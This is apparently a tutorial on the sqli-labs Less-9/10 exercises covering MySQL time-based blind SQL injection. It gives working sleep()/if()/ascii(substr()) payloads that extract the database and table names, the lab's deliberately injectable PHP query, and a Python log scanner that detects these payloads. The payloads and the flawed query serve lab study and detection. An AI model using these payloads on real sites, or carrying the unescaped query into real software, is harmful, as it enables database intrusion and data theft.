Less-9 & 10: Time-Based Blind Injection
Source: Internet  Editor: 程序博客网  Time: 2024/05/16 06:46
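Time-based blind injection
sleep() suspends execution for the given number of seconds
if(arg1, arg2, arg3): if arg1 is true, arg2 is evaluated; otherwise arg3 is evaluated;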
select sleep(3);
select if(database()='security',1,2);
select if(database()='security',sleep(5),NULL)name;
select if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=100,sleep(5),NULL)name;
select * from table where id = input
1 and (select sleep(5))--+;
select * from table where id = 'input'
1' and (select sleep(5)) --+;
(select if(ascii(substr(database(),1,1))>100,sleep(5),NULL))--+
1' and (select if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),NULL)name)--+
=> the result can be obtained
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_GET['id']))
{
	$id=$_GET['id'];
	//logging the connection parameters to a file for analysis.
	$fp=fopen('result.txt','a');
	fwrite($fp,'ID:'.$id."\n");
	fclose($fp);

	// connectivity
	// $id is placed inside the single quotes of the query without escaping (the lab's intended flaw).
	$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	// Both branches print the same message and errors are suppressed,
	// so only the response time differs between a true and a false condition.
	if($row)
	{
		echo '<font size="5" color="#FFFF00">';
		echo 'You are in...........';
		echo "<br>";
		echo "</font>";
	}
	else
	{
		echo '<font size="5" color="#FFFF00">';
		echo 'You are in...........';
		//print_r(mysql_error());
		//echo "You have an error in your SQL syntax";
		echo "</br></font>";
		echo '<font color= "#0000ff" font size= 3>';
	}
}
else
{
	echo "Please input the ID as parameter with numeric value";
}
?>
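The lab source above appends every id value to result.txt as an "ID:<value>" line. The following Python sketch is an added example, not part of the original post or of sqli-labs: it scans such log lines for the delay and character-extraction patterns shown earlier. The rule list, function names and sample log lines are constructed for illustration.

```python
import re

# Illustrative rules (assumed, not exhaustive): name -> regex on normalised input.
RULES = {
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\("),
    "conditional": re.compile(r"\bif\s*\("),
    "char_extraction": re.compile(r"\bascii\s*\(\s*(substr|substring|mid)\s*\("),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "quote_breakout": re.compile(r"^[^']*'\s*(and|or)\b"),
}

# Constructed sample of result.txt; PHP has already URL-decoded the values.
SAMPLE_LOG = [
    "ID:1\n",
    "ID:2\n",
    "ID:1' and (select sleep(5))-- \n",
    "ID:1' and (select if(ascii(substr(database(),1,1))>100,sleep(5),NULL))-- \n",
    "ID:1' AND (SELECT IF(ASCII(SUBSTR((select table_name from information_schema.tables"
    " where table_schema=database() limit 0,1),1,1))>100,SLEEP (5),NULL)name)-- \n",
    "ID:abc\n",
]

def normalise(value):
    """Lower-case and collapse whitespace so case and spacing do not matter."""
    return re.sub(r"\s+", " ", value.lower()).strip()

def classify(value):
    """Return the names of all rules that match one logged id value."""
    norm = normalise(value)
    return [name for name, rx in RULES.items() if rx.search(norm)]

def verdict(hits):
    """A delay inside if() is the extraction pattern; a bare delay is a probe."""
    if "time_delay" in hits and "conditional" in hits:
        return "timed-extraction"
    if "time_delay" in hits:
        return "delay-probe"
    return "suspicious" if hits else "non-numeric"

def scan_log(lines):
    """Report every 'ID:' entry that is not a plain integer, with its rule hits."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        if not line.startswith("ID:"):
            continue
        value = line[3:].rstrip("\n")
        if re.fullmatch(r"\d+", value):
            continue  # the only shape the page asks for ("numeric value")
        hits = classify(value)
        findings.append((line_no, verdict(hits), hits))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Because the page returns the same text in both branches, the logged id values and the response latency are the only places this activity shows up; a burst of "timed-extraction" entries from one client is the signal to look for.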